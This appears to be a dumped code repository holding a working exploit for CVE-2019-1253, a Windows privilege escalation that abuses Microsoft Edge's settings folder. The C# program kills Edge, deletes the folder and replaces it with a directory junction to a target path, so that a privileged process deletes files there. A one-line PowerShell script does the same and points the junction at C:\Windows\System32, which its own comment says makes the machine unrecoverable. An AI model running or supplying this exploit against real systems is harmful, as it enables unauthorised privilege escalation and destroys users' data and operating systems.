├── PrivilegedFileDelete.sln ├── PrivilegedFileDelete ├── App.config ├── PrivilegedFileDelete.csproj ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── bin │ ├── Debug │ │ ├── PrivilegedFileDelete.exe │ │ ├── PrivilegedFileDelete.exe.config │ │ └── PrivilegedFileDelete.pdb │ └── Release │ │ ├── PrivilegedFileDelete.exe │ │ ├── PrivilegedFileDelete.exe.config │ │ └── PrivilegedFileDelete.pdb └── obj │ ├── Debug │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── PrivilegedFileDelete.csproj.CoreCompileInputs.cache │ ├── PrivilegedFileDelete.csproj.FileListAbsolute.txt │ ├── PrivilegedFileDelete.csprojAssemblyReference.cache │ ├── PrivilegedFileDelete.exe │ └── PrivilegedFileDelete.pdb │ └── Release │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── PrivilegedFileDelete.csproj.CoreCompileInputs.cache │ ├── PrivilegedFileDelete.csproj.FileListAbsolute.txt │ ├── PrivilegedFileDelete.exe │ └── PrivilegedFileDelete.pdb └── exploit.ps1 /PrivilegedFileDelete.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.572 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PrivilegedFileDelete", "PrivilegedFileDelete\PrivilegedFileDelete.csproj", "{909736F1-25F7-40F5-8DD7-110B56BC4871}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {909736F1-25F7-40F5-8DD7-110B56BC4871}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {909736F1-25F7-40F5-8DD7-110B56BC4871}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {909736F1-25F7-40F5-8DD7-110B56BC4871}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {909736F1-25F7-40F5-8DD7-110B56BC4871}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {CED93BC8-8372-453D-9DD3-B9FD2E97AD37} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/PrivilegedFileDelete.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {909736F1-25F7-40F5-8DD7-110B56BC4871} 8 | Exe 9 | PrivilegedFileDelete 10 | PrivilegedFileDelete 11 | v4.6.1 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.Linq; 6 | using System.Text; 7 | using System.Threading.Tasks; 8 | 9 | namespace PrivilegedFileDelete 10 | { 11 | class Program 12 | { 13 | static void symlink(string folderPath, string targetpath) 14 | { 15 | Console.WriteLine("[!] Creating Directory Junction with target: " + targetpath); 16 | System.Diagnostics.Process process2 = new System.Diagnostics.Process(); 17 | System.Diagnostics.ProcessStartInfo startInfo1 = new System.Diagnostics.ProcessStartInfo(); 18 | startInfo1.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; 19 | startInfo1.FileName = "cmd.exe"; 20 | startInfo1.Arguments = "/C mklink /J \"" + folderPath + "\" \"" + targetpath + "\""; 21 | process2.StartInfo = startInfo1; 22 | process2.Start(); 23 | } 24 | static void killEdge() 25 | { 26 | Console.WriteLine("[!] Killing Microsoft Edge [!]"); 27 | System.Diagnostics.Process process = new System.Diagnostics.Process(); 28 | System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); 29 | startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; 30 | startInfo.FileName = "cmd.exe"; 31 | startInfo.Arguments = "/C taskkill /F /IM MicrosoftEdge.exe"; 32 | process.StartInfo = startInfo; 33 | process.Start(); 34 | 35 | 36 | } 37 | static void Main(string[] args) 38 | { 39 | Console.WriteLine("# Privileged File/Folder Delete Privilege Escalation"); 40 | Console.WriteLine("# CVE-2019-1253"); 41 | Console.WriteLine("# Exploit Author: Nabeel Ahmed (@rogue_kdc)"); 42 | Console.WriteLine("# Tested on: Microsoft Windows 10 x32 & x64"); 43 | Console.WriteLine("# Category: Local"); 44 | 45 | if (args.Length > 0 & args.Length < 2) 46 | { 47 | var pathWithEnv = @"%USERPROFILE%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings"; 48 | var folderPath = Environment.ExpandEnvironmentVariables(pathWithEnv); 49 | string targetpath = args[0]; 50 | if (Directory.Exists(targetpath)) 51 | { 52 | while (true) 53 | { 54 | Process[] pname = Process.GetProcessesByName("MicrosoftEdge"); 55 | if (!(pname.Length == 0)) 56 | { 57 | killEdge(); 58 | } 59 | else 60 | { 61 | Console.WriteLine("[!] Microsoft Edge isn't running or it's killed [!]"); 62 | break; 63 | } 64 | 65 | } 66 | while (true) 67 | { 68 | try 69 | { 70 | Directory.Delete(folderPath, true); 71 | if (Directory.Exists(folderPath)) 72 | { 73 | Console.WriteLine("[!] Folder %s exists [!]", folderPath); 74 | Console.WriteLine("[!] Trying to delete Folder %s [!]", folderPath); 75 | 76 | } 77 | else 78 | { 79 | Console.WriteLine("[!] Folder doesn't exist."); 80 | Console.WriteLine("[!] Attempting to create Directory Junction"); 81 | symlink(folderPath, targetpath); 82 | break; 83 | } 84 | } 85 | catch 86 | { 87 | Console.WriteLine("[!] Folder doesn't exist."); 88 | Console.WriteLine("[!] Attempting to create Directory Junction"); 89 | symlink(folderPath, targetpath); 90 | break; 91 | } 92 | 93 | } 94 | 95 | Console.WriteLine("[!] Triggering vulnerability ... [!] "); 96 | System.Diagnostics.Process process2 = new System.Diagnostics.Process(); 97 | System.Diagnostics.ProcessStartInfo startInfo1 = new System.Diagnostics.ProcessStartInfo(); 98 | startInfo1.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; 99 | startInfo1.FileName = "cmd.exe"; 100 | startInfo1.Arguments = "/C start microsoft-edge:"; 101 | process2.StartInfo = startInfo1; 102 | process2.Start(); 103 | Console.WriteLine("[!] Triggering vulnerability ... [!] "); 104 | Console.WriteLine("[!] Files are now being deleted [!] "); 105 | } 106 | else 107 | { 108 | Console.WriteLine("[!] Target folder doesn't exist [!] "); 109 | } 110 | } 111 | else 112 | { 113 | Console.WriteLine("-------------------------------------------------"); 114 | Console.WriteLine("[+] Usage: exploit.exe "); 115 | Console.WriteLine("-------------------------------------------------"); 116 | Console.WriteLine("[!] This exploit can be very destructive [!] "); 117 | Console.WriteLine("[!] Use with caution [!] "); 118 | Console.WriteLine("-------------------------------------------------"); 119 | if (args.Length >= 2) 120 | { 121 | Console.WriteLine("[!] Looks like you forgot to put quotes around your path!!"); 122 | } 123 | 124 | } 125 | 126 | } 127 | } 128 | } 129 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("PrivilegedFileDelete")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("PrivilegedFileDelete")] 13 | [assembly: AssemblyCopyright("Copyright © 2019")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("909736f1-25f7-40f5-8dd7-110b56bc4871")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/bin/Debug/PrivilegedFileDelete.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/bin/Debug/PrivilegedFileDelete.exe -------------------------------------------------------------------------------- /PrivilegedFileDelete/bin/Debug/PrivilegedFileDelete.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/bin/Debug/PrivilegedFileDelete.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/bin/Debug/PrivilegedFileDelete.pdb -------------------------------------------------------------------------------- /PrivilegedFileDelete/bin/Release/PrivilegedFileDelete.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/bin/Release/PrivilegedFileDelete.exe -------------------------------------------------------------------------------- /PrivilegedFileDelete/bin/Release/PrivilegedFileDelete.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/bin/Release/PrivilegedFileDelete.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/bin/Release/PrivilegedFileDelete.pdb -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Debug/PrivilegedFileDelete.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | f14a379f23877c836ecb060c59692e414c9d76b1 2 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Debug/PrivilegedFileDelete.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\bin\Debug\PrivilegedFileDelete.exe.config 2 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\bin\Debug\PrivilegedFileDelete.exe 3 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\bin\Debug\PrivilegedFileDelete.pdb 4 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\obj\Debug\PrivilegedFileDelete.csprojAssemblyReference.cache 5 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\obj\Debug\PrivilegedFileDelete.csproj.CoreCompileInputs.cache 6 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\obj\Debug\PrivilegedFileDelete.exe 7 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\obj\Debug\PrivilegedFileDelete.pdb 8 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Debug/PrivilegedFileDelete.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/obj/Debug/PrivilegedFileDelete.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Debug/PrivilegedFileDelete.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/obj/Debug/PrivilegedFileDelete.exe -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Debug/PrivilegedFileDelete.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/obj/Debug/PrivilegedFileDelete.pdb -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Release/PrivilegedFileDelete.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | f14a379f23877c836ecb060c59692e414c9d76b1 2 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Release/PrivilegedFileDelete.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\bin\Release\PrivilegedFileDelete.exe.config 2 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\bin\Release\PrivilegedFileDelete.exe 3 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\bin\Release\PrivilegedFileDelete.pdb 4 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\obj\Release\PrivilegedFileDelete.csproj.CoreCompileInputs.cache 5 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\obj\Release\PrivilegedFileDelete.exe 6 | C:\Users\Nabeel\Documents\R&D\Windows\Windows Apps LPE\File Delete\exploit\PrivilegedFileDelete\PrivilegedFileDelete\obj\Release\PrivilegedFileDelete.pdb 7 | -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Release/PrivilegedFileDelete.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/obj/Release/PrivilegedFileDelete.exe -------------------------------------------------------------------------------- /PrivilegedFileDelete/obj/Release/PrivilegedFileDelete.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogue-kdc/CVE-2019-1253/a82569a461c3ca97021ea51d40f8b045dc7885c3/PrivilegedFileDelete/obj/Release/PrivilegedFileDelete.pdb -------------------------------------------------------------------------------- /exploit.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | Use it responsibly, if exploit is used AS IS, it will destroy your machine and make it unrecoverable. 3 | This exploit can be used for privilege escalation as well as permanent DoS!!! 4 | I warned you :) 5 | #> 6 | Get-Process -Name MicrosoftEdge | Stop-Process;sleep 2; remove-item "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings" -recurse -force; New-Item -Path "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings" -ItemType Junction -Value "C:\Windows\System32"; start microsoft-edge: 7 | --------------------------------------------------------------------------------